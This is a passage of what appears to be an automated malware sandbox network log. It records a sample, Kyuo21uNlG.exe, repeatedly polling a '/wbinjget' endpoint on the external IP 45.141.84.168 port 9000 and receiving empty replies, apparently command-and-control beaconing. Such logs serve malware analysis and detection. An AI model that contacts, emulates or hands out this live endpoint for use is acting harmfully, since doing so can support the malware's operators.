                                          Nov 28, 2024 13:41:57.017291069 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:58.374618053 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:58 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          99192.168.2.44995845.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:58.608819962 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:00.013712883 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:59 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          100192.168.2.44995945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:00.252926111 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:01.611123085 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:01 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          101192.168.2.44996045.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:01.847484112 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:03.203799963 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:02 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          102192.168.2.44996245.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:03.439618111 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:04.761054039 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:04 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          103192.168.2.44996345.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:04.986943007 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:06.347270966 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:06 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          104192.168.2.44996445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:06.582716942 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:07.939071894 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:07 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          105192.168.2.44996545.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:08.365957975 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:09.727902889 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:09 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          106192.168.2.44996645.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:09.952938080 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:11.313745975 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:11 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          107192.168.2.44996745.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:11.551269054 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:42:12.909869909 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:12 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          108192.168.2.44996845.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:13.143507957 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:14.504756927 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:14 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          109192.168.2.44996945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:14.734651089 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:16.138649940 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:15 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          110192.168.2.44997045.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:16.388807058 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:17.781466007 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:17 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          111192.168.2.44997145.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:18.020406008 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:42:19.423775911 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:19 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          112192.168.2.44997245.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:19.719933033 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:42:21.027051926 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:20 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          113192.168.2.44997445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:21.252881050 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:22.568733931 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:22 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          114192.168.2.44997545.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:22.797821999 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:24.155630112 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:23 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          115192.168.2.44997645.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:24.392760038 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:25.749527931 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:25 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          116192.168.2.44997745.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:25.987668991 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:27.345273972 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:27 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          117192.168.2.44997845.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:27.583054066 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:28.990683079 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:28 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          118192.168.2.44997945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:29.220195055 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:30.575819016 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:30 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          119192.168.2.44998045.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:30.867166042 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:32.225383043 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:32 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          120192.168.2.44998145.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:32.453764915 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:33.813096046 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:33 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          121192.168.2.44998245.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:34.047036886 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:35.404906034 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:35 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          122192.168.2.44998345.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:35.641278982 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:37.006830931 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:36 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          123192.168.2.44998445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:37.235820055 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:38.596899033 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:38 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          124192.168.2.44998545.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:38.828356028 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:42:40.241969109 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:39 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          125192.168.2.44998645.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:40.470932007 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:41.826278925 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:41 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          126192.168.2.44998745.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:42.064770937 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:43.374285936 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:43 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          127192.168.2.44998845.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:42:43.612174988 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:42:44.922640085 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:42:44 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          128192.168.2.44998945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
